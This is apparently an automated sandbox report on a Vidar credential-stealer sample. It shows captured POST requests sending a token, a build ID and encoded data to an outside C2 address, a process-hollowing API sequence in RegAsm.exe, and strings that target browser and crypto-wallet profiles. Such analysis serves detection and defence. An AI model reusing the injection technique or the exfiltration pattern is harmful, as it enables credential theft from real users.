Ascii: Py4dxUE5VtzHaTgYA4554vwBFD/abe+mhTUXtJr23KrDbRBEcTSZQgDEmTll6YzXHXxeFnG1RXX9I9LC5djqc70XZ279N/xsbP/CX+IP8AoJN/35j/APiaP+Ev8Qf9BJv+/Mf/AMTXJJqcUXhvT9duWl+yXUcu0R4DTyrI6hUyDgbU3MSDjI7kCtWzstRu7zTVj07UpLO6jtXe5S2YqPMVS5DBduFyevTHNYRll7fwnVOnnEN5v7/kbH/CX+IP+
2024-03-28 19:35:20 UTC	16355	OUT	Data Raw: 55 66 6e 70 6e 2b 4e 59 50 78 42 2f 77 43 52 69 68 2f 36 39 45 2f 39 44 65 76 53 36 38 30 2b 49 50 38 41 79 4d 55 50 2f 58 6f 6e 2f 6f 62 31 6a 67 4a 38 32 4b 68 6f 6c 76 38 41 6b 7a 6e 7a 6d 4e 73 42 55 31 37 66 6d 6a 6c 61 53 6c 6f 72 36 67 2b 43 45 2f 43 6a 6d 6c 6f 6f 43 34 6c 47 4b 57 6b 7a 54 41 57 6b 6f 70 4b 41 46 34 70 4b 4b 4b 51 77 6f 6f 6f 6f 43 77 55 6c 4c 53 47 67 41 6f 6f 6f 6f 41 4b 44 52 52 51 4d 53 69 69 69 67 41 70 4b 44 52 51 4d 4b 4b 4b 4b 41 45 6f 6f 6f 6f 41 4b 51 30 74 4a 51 4d 4b 4b 4b 4b 41 45 6f 6f 6f 6f 47 4a 33 6f 70 61 53 67 41 6f 6f 70 4b 42 68 52 52 53 47 67 59 55 55 55 6c 43 41 4b 44 52 53 47 6d 4d 4b 4b 4b 4b 41 45 6f 6f 6f 6f 47 49 61 4b 57 6b 6f 41 4b 53 6c 70 4b 42 68 53 55 47 69 67 61 43 6b 6f 4e 46 41 78 4b 4b 44 52 Data Ascii: Ufnpn+NYPxB/wCRih/69E/9DevS680+IP8AyMUP/Xon/ob1jgJ82Kholv8AkznzmNsBU17fmjlaSlor6g+CE/CjmlooC4lGKWkzTAWkopKAF4pKKKQwooooCwUlLSGgAooooAKDRRQMSiiigApKDRQMKKKKAEooooAKQ0tJQMKKKKAEooooGJ3opaSgAoopKBhRRSGgYUUUlCAKDRSGmMKKKKAEooooGIaKWkoAKSlpKBhSUGigaCkoNFAxKKDR
2024-03-28 19:35:20 UTC	60	OUT	Data Raw: 64 55 36 75 53 66 38 41 49 46 74 66 2b 76 69 62 2f 77 42 42 6a 6f 41 2f 2f 39 6b 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 43 41 41 45 42 47 43 41 4b 4b 46 49 44 42 4b 4a 4a 2d 2d 0d 0a Data Ascii: dU6uSf8AIFtf+vib/wBBjoA//9k=------HCFCAAEBGCAKKFIDBKJJ--
2024-03-28 19:35:22 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Mar 2024 19:35:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-03-28 19:35:22 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.6	49732	78.46.229.36	443	5832	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 19:35:23 UTC	310	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----ECBGCGCGIEGCBFHIIEBF User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Host: 78.46.229.36 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-03-28 19:35:23 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 43 42 47 43 47 43 47 49 45 47 43 42 46 48 49 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 39 33 61 39 64 34 35 38 33 66 35 39 66 38 65 36 39 31 39 63 30 65 65 39 62 31 36 62 30 35 35 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 47 43 47 43 47 49 45 47 43 42 46 48 49 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 65 62 66 66 33 66 34 66 33 38 65 39 62 65 65 61 66 38 65 32 31 35 61 37 36 32 63 38 35 34 39 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 47 43 47 43 47 49 45 47 43 42 46 48 49 49 45 42 46 0d 0a 43 6f 6e 74 Data Ascii: ------ECBGCGCGIEGCBFHIIEBFContent-Disposition: form-data; name="token"b93a9d4583f59f8e6919c0ee9b16b055------ECBGCGCGIEGCBFHIIEBFContent-Disposition: form-data; name="build_id"debff3f4f38e9beeaf8e215a762c8549------ECBGCGCGIEGCBFHIIEBFCont
2024-03-28 19:35:23 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Mar 2024 19:35:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-03-28 19:35:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.6	49733	78.46.229.36	443	5832	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 19:35:24 UTC	310	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BFHJJJDAFBKEBGDGHCGD User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Host: 78.46.229.36 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-03-28 19:35:24 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 46 48 4a 4a 4a 44 41 46 42 4b 45 42 47 44 47 48 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 39 33 61 39 64 34 35 38 33 66 35 39 66 38 65 36 39 31 39 63 30 65 65 39 62 31 36 62 30 35 35 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 4a 4a 4a 44 41 46 42 4b 45 42 47 44 47 48 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 65 62 66 66 33 66 34 66 33 38 65 39 62 65 65 61 66 38 65 32 31 35 61 37 36 32 63 38 35 34 39 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 4a 4a 4a 44 41 46 42 4b 45 42 47 44 47 48 43 47 44 0d 0a 43 6f 6e 74 Data Ascii: ------BFHJJJDAFBKEBGDGHCGDContent-Disposition: form-data; name="token"b93a9d4583f59f8e6919c0ee9b16b055------BFHJJJDAFBKEBGDGHCGDContent-Disposition: form-data; name="build_id"debff3f4f38e9beeaf8e215a762c8549------BFHJJJDAFBKEBGDGHCGDCont
2024-03-28 19:35:24 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Mar 2024 19:35:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-03-28 19:35:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	1
Start time:	20:34:48
Start date:	28/03/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0xe80000
File size:	229'512 bytes
MD5 hash:	78F23006210BDA6B5E26B8CBEFA9758A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000002.2121549788.0000000004315000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	20:34:48
Start date:	28/03/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	20:34:49
Start date:	28/03/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xd0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	20:34:49
Start date:	28/03/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xde0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2403578458.00000000013BA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2403578458.0000000001427000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	20:34:50
Start date:	28/03/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 2016 -s 848
Imagebase:	0xba0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	39.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	19.1%
Total number of Nodes:	68
Total number of Limit Nodes:	4

Executed Functions

Function 0331211D Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 282
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0331228C
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0331229F
Wow64GetThreadContext.KERNEL32(?,00000000), ref: 033122BD
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 033122E1
VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 0331230C
TerminateProcess.KERNELBASE(?,00000000), ref: 0331232B
WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?), ref: 03312364
WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,00000028), ref: 033123AF
WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 033123ED
Wow64SetThreadContext.KERNEL32(?,?), ref: 03312429
ResumeThread.KERNELBASE(?), ref: 03312438

Strings

aryA, xrefs: 03312163
ress, xrefs: 033121A7
Load, xrefs: 0331215B
GetP, xrefs: 0331219F

Memory Dump Source

Source File: 00000001.00000002.2120758521.0000000003311000.00000040.00000800.00020000.00000000.sdmp, Offset: 03311000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3311000_file.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
String ID: GetP$Load$aryA$ress
API String ID: 2440066154-977067982
Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction ID: 0930199be4f1218fafb4d3e2d4fe0a8a5e14e5fac0a47e515b509160eb38cb75
Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction Fuzzy Hash: 8EB1E67264024AAFDB60CF68CC80BDA77A9FF88714F158564EA0CEB341D774FA518B94

Uniqueness

Uniqueness Score: -1.00%

Function 014D0EEF Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 566
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 014D15F8

Strings

d, xrefs: 014D1175

Memory Dump Source

Source File: 00000001.00000002.2120318144.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_14d0000_file.jbxd

Similarity

API ID: ProtectVirtual
String ID: d
API String ID: 544645111-2564639436
Opcode ID: e5239a6b86e4278babe85ac19382ce469563ec605705c15a3686c53cb3ed8488
Instruction ID: 290921f27b8aa32f925f1c48eacb939b278efb6f57cb206163f7399c43831576
Opcode Fuzzy Hash: e5239a6b86e4278babe85ac19382ce469563ec605705c15a3686c53cb3ed8488
Instruction Fuzzy Hash: 0332B430A002558FCB05DFA9C4A06ADFBF2FF89714F59C55AD459AB262C734EC82CB94

Uniqueness

Uniqueness Score: -1.00%

Function 014D1708 Relevance: 1.6, APIs: 1, Instructions: 73
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(?,?,?,00000000,?,?), ref: 014D17AC

Memory Dump Source

Source File: 00000001.00000002.2120318144.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_14d0000_file.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 2ffc7d94706029e64cc53edea8cad314a6ae82ccce54203528a933c5f62d8a77
Instruction ID: 9f61199bb8a6560bfba0e01ac39334e75d0b8993d152187a07fd53ec1920c549
Opcode Fuzzy Hash: 2ffc7d94706029e64cc53edea8cad314a6ae82ccce54203528a933c5f62d8a77
Instruction Fuzzy Hash: 7C3114B59003499FDF10CFA9D984ADEBBF1FF88310F24842AE919A7210D7759954CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 014D1710 Relevance: 1.6, APIs: 1, Instructions: 70
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(?,?,?,00000000,?,?), ref: 014D17AC

Memory Dump Source

Source File: 00000001.00000002.2120318144.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_14d0000_file.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: c5b3ed9dcdcf74dc3018ee6ad06ee1d86fa9d1f418b98e7d1768483b87fed64b
Instruction ID: c28953961d16b4963baa5c6480c442a48889f657bd4dc1799d2799b1ad80489e
Opcode Fuzzy Hash: c5b3ed9dcdcf74dc3018ee6ad06ee1d86fa9d1f418b98e7d1768483b87fed64b
Instruction Fuzzy Hash: 1C2104B59003499FDF10CFAAD984ADEBBF5FF88710F20842AE919A7210D7759954CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 014D1578 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 014D15F8

Memory Dump Source

Source File: 00000001.00000002.2120318144.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_14d0000_file.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: ee212c88eda1ba863d833537bfe2353975b0dae24d5fa6f743b8225085f57afa
Instruction ID: ca9e977ea7ee9747b5a8dc6dbcc704fdf87a99d2535c4843ed16d3440684b0ea
Opcode Fuzzy Hash: ee212c88eda1ba863d833537bfe2353975b0dae24d5fa6f743b8225085f57afa
Instruction Fuzzy Hash: 722128B19003499FDF10CFAAC981BDEBBF5FF88710F14842AE919A7250D7799910CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 014D1651 Relevance: 1.6, APIs: 1, Instructions: 52
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(?,?), ref: 014D16BD

Memory Dump Source

Source File: 00000001.00000002.2120318144.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_14d0000_file.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: c162050b8620ec58c4bee279d68a15d4a767590a421c02fb4b176ef0a2810ef9
Instruction ID: 177a07f2f45873836b1924d571cae11a9bc2cf9dee140f084bb72412c709d543
Opcode Fuzzy Hash: c162050b8620ec58c4bee279d68a15d4a767590a421c02fb4b176ef0a2810ef9
Instruction Fuzzy Hash: C71167718003498FDB20DFAAC445BDEFFF5AF88720F24841AD559A7240DB75A544CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 014D1658 Relevance: 1.6, APIs: 1, Instructions: 50
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(?,?), ref: 014D16BD

Memory Dump Source

Source File: 00000001.00000002.2120318144.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_14d0000_file.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 670f09b1790e020fbd0e3d3c942770b54df185de5c9fc7d2232646cfab718f3b
Instruction ID: ed5c11c5b13b663e914e9a900d5ad9452a92fbd0980ee80aab0f065d1e0571c9
Opcode Fuzzy Hash: 670f09b1790e020fbd0e3d3c942770b54df185de5c9fc7d2232646cfab718f3b
Instruction Fuzzy Hash: A81116B19003498FDB10DFAAC445BDFFBF5AF88720F24841AD519A7250DB75A544CBA4

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: RegAsm.exePID: 5832, Parent PID: 2016COMMON

Execution Graph

Execution Coverage:	4.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.3%
Total number of Nodes:	2000
Total number of Limit Nodes:	40

Executed Functions

Function 00415745 Relevance: 63.2, APIs: 34, Strings: 2, Instructions: 152
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00415677), ref: 0041574A
GetProcAddress.KERNEL32(00000000), ref: 00415764
GetProcAddress.KERNEL32 ref: 0041578E
GetProcAddress.KERNEL32 ref: 004157A5
GetProcAddress.KERNEL32 ref: 004157BC
GetProcAddress.KERNEL32 ref: 004157D3
GetProcAddress.KERNEL32 ref: 004157EA
GetProcAddress.KERNEL32 ref: 00415801
GetProcAddress.KERNEL32 ref: 00415818
GetProcAddress.KERNEL32 ref: 0041582F
GetProcAddress.KERNEL32 ref: 00415846
GetProcAddress.KERNEL32 ref: 0041585D
GetProcAddress.KERNEL32 ref: 00415874
GetProcAddress.KERNEL32 ref: 0041588B
GetProcAddress.KERNEL32 ref: 004158A2
GetProcAddress.KERNEL32 ref: 004158B9
GetProcAddress.KERNEL32 ref: 004158D0
GetProcAddress.KERNEL32 ref: 004158E7
GetProcAddress.KERNEL32 ref: 004158FE
GetProcAddress.KERNEL32 ref: 00415915
GetProcAddress.KERNEL32 ref: 0041592C
GetProcAddress.KERNEL32 ref: 00415943
LoadLibraryA.KERNEL32 ref: 00415954
LoadLibraryA.KERNEL32 ref: 00415965
LoadLibraryA.KERNEL32 ref: 00415976
LoadLibraryA.KERNEL32 ref: 00415987
LoadLibraryA.KERNEL32 ref: 00415998
GetProcAddress.KERNEL32(75B30000), ref: 004159B3
GetProcAddress.KERNEL32(751E0000), ref: 004159CE
GetProcAddress.KERNEL32 ref: 004159E5
GetProcAddress.KERNEL32(76910000), ref: 00415A00
GetProcAddress.KERNEL32(75670000), ref: 00415A1B
GetProcAddress.KERNEL32(77310000), ref: 00415A36
GetProcAddress.KERNEL32(NtQueryInformationProcess), ref: 00415A4C

Strings

NtQueryInformationProcess, xrefs: 00415A3C
kernel32.dll, xrefs: 00415745

Memory Dump Source

Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: NtQueryInformationProcess$kernel32.dll
API String ID: 2238633743-258108907
Opcode ID: 30b36923f7cc683abfa8e6bba1c50ec0fbbe051430f41ca833dd4dc26adf1b88
Instruction ID: 943813a7e8cdfaee46e546c6bd2abadad7e04ea3772aa9d505a167681ce51a43
Opcode Fuzzy Hash: 30b36923f7cc683abfa8e6bba1c50ec0fbbe051430f41ca833dd4dc26adf1b88
Instruction Fuzzy Hash: BE71F975511600EFDB169FA0FE08A293FB7FB48B21B14712AF905D2270DB364862EF94

Uniqueness

Uniqueness Score: -1.00%

Function 00413DF6 Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 269
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 00413DFB
wsprintfA.USER32 ref: 00413E21
FindFirstFileA.KERNEL32(?,?), ref: 00413E38
memset.MSVCRT ref: 00413E4F
memset.MSVCRT ref: 00413E5D
StrCmpCA.SHLWAPI(?,0042464C), ref: 00413E7B
StrCmpCA.SHLWAPI(?,00424650), ref: 00413E95
wsprintfA.USER32 ref: 00413EB9
StrCmpCA.SHLWAPI(?,0042437B), ref: 00413ECA
wsprintfA.USER32 ref: 00413EF0
wsprintfA.USER32 ref: 00413F04
memset.MSVCRT ref: 00413F16
lstrcat.KERNEL32(?,?), ref: 00413F28
strtok_s.MSVCRT ref: 00413F61
memset.MSVCRT ref: 00413F76
lstrcat.KERNEL32(?,?), ref: 00413F88
PathMatchSpecA.SHLWAPI(?,00000000), ref: 00413FAB

Part of subcall function 0040F870: _EH_prolog.MSVCRT ref: 0040F875
Part of subcall function 0040F870: GetSystemTime.KERNEL32(?,004242A8,00000001,00000000,00000000), ref: 0040F8B5

wsprintfA.USER32 ref: 00413FE2
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00414030
strtok_s.MSVCRT ref: 00414046
FindNextFileA.KERNELBASE(000000FF,?), ref: 00414158
FindClose.KERNEL32(000000FF), ref: 00414169

Strings

%s\*.*, xrefs: 00413E16
%s\%s, xrefs: 00413EFE
%s\%s, xrefs: 00413EB3
%s%s, xrefs: 00413FD7
%s\%s\%s, xrefs: 00413EEA

Memory Dump Source

Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: wsprintf$memset$Find$FileH_prologlstrcatstrtok_s$CloseFirstMatchNextPathSpecSystemTimeUnothrow_t@std@@@__ehfuncinfo$??2@
String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*.*
API String ID: 3694881843-3225784412
Opcode ID: fec0c414f8e1afe49e3107e88059ecf2f4496831816e7e1288457dbc03d5325c
Instruction ID: 5873a142937eda09b2e4110fb57f212c99cef34e8fd1e276495b4819595d2ad4
Opcode Fuzzy Hash: fec0c414f8e1afe49e3107e88059ecf2f4496831816e7e1288457dbc03d5325c
Instruction Fuzzy Hash: 65A18E7190021DABCF21EFA1DD49EDE7BBDEF08304F004466F509E2151E7399A998BA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040C094 Relevance: 44.6, APIs: 19, Strings: 6, Instructions: 871
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 0040C099

Part of subcall function 0040E580: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E5AA

Part of subcall function 0040E685: _EH_prolog.MSVCRT ref: 0040E68A
Part of subcall function 0040E685: lstrcpy.KERNEL32(00000000), ref: 0040E6D6
Part of subcall function 0040E685: lstrcat.KERNEL32(?,?), ref: 0040E6E0

Part of subcall function 0040E6F9: _EH_prolog.MSVCRT ref: 0040E6FE
Part of subcall function 0040E6F9: lstrlen.KERNEL32(?,?,?,?,?,004156A9,?,?,00424818,?,00000000,004243BE), ref: 0040E726
Part of subcall function 0040E6F9: lstrcpy.KERNEL32(00000000), ref: 0040E74D
Part of subcall function 0040E6F9: lstrcat.KERNEL32(?,?), ref: 0040E758

Part of subcall function 0040E63E: lstrcpy.KERNEL32(00000000,?), ref: 0040E677

FindFirstFileA.KERNEL32(00000000,?,00423AC2,00423ABF,00000000,?,00423C00,?,?,00423ABE,?,?,00000000), ref: 0040C13A
StrCmpCA.SHLWAPI(?,00423C04,?,?,00000000), ref: 0040C1A1
StrCmpCA.SHLWAPI(?,00423C08,?,?,00000000), ref: 0040C1BB
StrCmpCA.SHLWAPI(00000000,Opera GX,00000000,?,?,?,00423C0C,?,?,00423AC3,?,?,00000000), ref: 0040C269

Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066

Strings

Google Chrome, xrefs: 0040C998
\BraveWallet\Preferences, xrefs: 0040C55A
Opera GX, xrefs: 0040C25B
B, xrefs: 0040CC6B
Brave, xrefs: 0040C45B
Preferences, xrefs: 0040C477

Memory Dump Source

Source File: 00000004.00000002.2402880577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2402880577.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000520000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.0000000000600000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2402880577.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prologlstrcpy$lstrcat$FileFindFirstlstrlen
String ID: B$Brave$Google Chrome$Opera GX$Preferences$\BraveWallet\Preferences
API String ID: 3869166975-1712999469
Opcode ID: 96257d730ce526c9159ba42439116b6d6f8b04f1d2090bc30aa830645dfff910
Instruction ID: 2935aff20516a059bc5eb3bf57b5c8f1a0087bd47fb391aeb33e6bd4022e98c1
